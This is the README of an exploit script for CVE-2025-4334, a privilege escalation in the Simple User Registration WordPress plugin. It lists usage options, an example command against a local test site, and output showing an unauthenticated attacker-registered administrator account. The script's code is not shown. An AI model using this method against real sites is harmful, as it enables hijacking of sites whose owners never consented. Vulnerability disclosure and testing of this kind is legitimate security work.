# 🔓 Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation

## 📄 Description

The **Simple User Registration** plugin for WordPress is vulnerable to **Privilege Escalation** in all versions up to, and including, **6.3**.  
This is due to insufficient restrictions on user meta values that can be supplied during registration.  
This makes it possible for **unauthenticated attackers** to register as an **administrator**.

---

## 🛡️ Vulnerability Details

- **Type**: Improper Privilege Management  
- **CVE**: CVE-2025-4334  
- **CVSS Score**: 9.8 (Critical)  
- **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`  
- **Publicly Published**: June 25, 2025  
- **Last Updated**: June 26, 2025  

---

## 🛠️ Exploit Script

The exploit automates privilege escalation via form submission using extracted nonce, form ID, and referer.

### ⚙️ Usage

```bash
python CVE-2025-4334.py -h
```

```
usage: CVE-2025-4334.py [-h] -u URL --form FORM

Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation - by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Base WordPress URL (e.g. http://localhost/wordpress/)
  --form FORM    Full URL of the page that contains the registration form
```

---

## 🌐 URL Explanation

- `-u` → Base WordPress installation (e.g. `http://localhost/wordpress/`)  
- `--form` → Full URL to the vulnerable registration form (e.g. `http://localhost/wpr/default-registration/`)

---

## 🧪 Example

```bash
python CVE-2025-4334.py -u http://localhost/wordpress/ --form http://localhost/wpr/default-registration/
```

#### ✅ Result

```
[i] Extracted Nonce   : ffcf0140a8
[i] Extracted Form ID : 76
[i] Referer Path      : /wpr/default-registration/
[i] HTTP Response Code : 200
[i] Server Response    : {"user_id":13,"status":"success","signup":"signup","message":"Registration Done !\r\nUser Register Email not sent, please contact admin","redirect_url_signup":null}

[+] Exploitation Successful
[+] Username   : Nxploitedadmin
[+] First Name : Nxploitedadmin
[+] Last Name  : Nxploitedadmin
[+] Email      : test@admin.ksa
[+] Password   : nxp1234
[+] Role       : administrator

Exploit By : Khaled_alenazi (Nxploited)
```

---

## ⚠️ Disclaimer

This script is provided for **educational and research purposes only**.  
The author is **not responsible** for any misuse or damage caused by this tool.

---

*By: Khaled_alenazi (Nxploited)*
